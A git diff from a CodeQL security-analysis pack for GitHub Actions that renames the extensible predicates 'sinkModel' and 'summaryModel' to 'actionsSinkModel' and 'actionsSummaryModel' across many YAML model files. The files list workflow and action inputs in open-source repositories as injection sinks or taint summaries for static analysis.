+1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml index 1a276f8812f7..8a11ced42d02 100644 --- a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml index ef448c8f4c0d..4c018b20f223 100644 --- a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml index 6c6721700258..315c85efeb62 100644 --- a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "input.verSion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml index b7104a8b6153..8a3132d52582 100644 --- a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml index cd81a7239066..9a669c8c009a 100644 --- a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.python-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml index 1b2ce37480f5..0ecb817822c0 100644 --- a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml index 91889927c452..e4590eeec8b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index 8d4400bd3ead..ea0ddad06978 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml index 29c7e1bd3e24..9352f766e82d 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml index 109dce9df0db..d436644f4acd 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index e3643f0156b2..c6c01abca904 100644 --- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "input.pull_request_number", "code-injection", "generated"] @@ -9,7 +9,7 @@ extensions: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"] - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "output.pull_request_number", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml index a4bba59b5a5c..8a9f76e7e52d 100644 --- a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml index d12982c35a45..8b3cfebc67b9 100644 --- a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml index deb10e5e4b4f..9add4859f35a 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "input.manifest_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml index 5c22f0ffcb76..efc8097b963f 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml index 790e94c2aacd..6a305522cfb4 100644 --- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml index fedb21393bc3..441325c76a5f 100644 --- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml index f60fffb206e2..5f0831afc073 100644 --- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml index c7fe932aba20..afd7aabc1fce 100644 --- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml index d47aea3363f3..49e556f585f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml index f32acf5038ef..24585aa50ed0 100644 --- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.next", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml index c739b5750ccb..afc7af28f9b4 100644 --- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.secondary_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml index 7ac3c0fb530e..5b3d91a8a7ba 100644 --- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"] - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "input.hz", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml index c641035f9662..b43253eb619a 100644 --- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml index adea8ae4bd2c..89559cf57e3f 100644 --- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml index 857c946e2b78..6292841e56ad 100644 --- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml index 717022ea6e83..9f98fd51139d 100644 --- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"] - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml index 7dadb99209db..e04605511b89 100644 --- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"] - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml index ca3cb0091e90..a77181e6c4eb 100644 --- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"] - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml index 6faf8b900578..6c90e29a43bf 100644 --- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml index 39b6773a2b19..6bacbc181daa 100644 --- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"] - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.test-arguments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml index cbbce950b419..83d438d4e3d4 100644 --- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"] - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.source", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml index 48206551bcd0..703a766cb4cb 100644 --- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"] - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "input.test_environment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml index 256ad3f0e042..ecb4c809efe4 100644 --- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml index ae408b131e08..9b02577be7d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"] - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.build_image_name", "code-injection", "generated"] @@ -9,6 +9,6 @@ extensions: - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"] diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml index c7e2cf41b3f6..1ffc3df1c815 100644 --- a/ql/lib/ext/getsentry_action-release.model.yml +++ b/ql/lib/ext/getsentry_action-release.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"] - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml index 781384a2fe19..53ed1840b0a1 100644 --- a/ql/lib/ext/github_codeql-action.model.yml +++ b/ql/lib/ext/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"] diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml index 9036f199f424..17d2ed2e4735 100644 --- a/ql/lib/ext/go-semantic-release_action.model.yml +++ b/ql/lib/ext/go-semantic-release_action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"] diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml index 7eee95dbcce4..68c2552c3505 100644 --- a/ql/lib/ext/golangci_golangci-lint-action.model.yml +++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml index 4fe9e32ce521..977f6b98ae4b 100644 --- a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml +++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"] - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection", "manual"] diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml index 0352ece87b52..616f7fdb9ca8 100644 --- a/ql/lib/ext/goreleaser_goreleaser-action.model.yml +++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml index 712f2ce3395c..e4961ae5ed63 100644 --- a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml +++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"] - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml index 45c00c1c30ea..19cce83c691d 100644 --- a/ql/lib/ext/gradle_gradle-build-action.model.yml +++ b/ql/lib/ext/gradle_gradle-build-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"] - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint", "manual"] diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml index 8f05918155ed..f838eeed0eb8 100644 --- a/ql/lib/ext/haya14busa_action-cond.model.yml +++ b/ql/lib/ext/haya14busa_action-cond.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"] - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml index 708c310c05f4..48e5b05128f8 100644 --- a/ql/lib/ext/hexlet_project-action.model.yml +++ b/ql/lib/ext/hexlet_project-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: 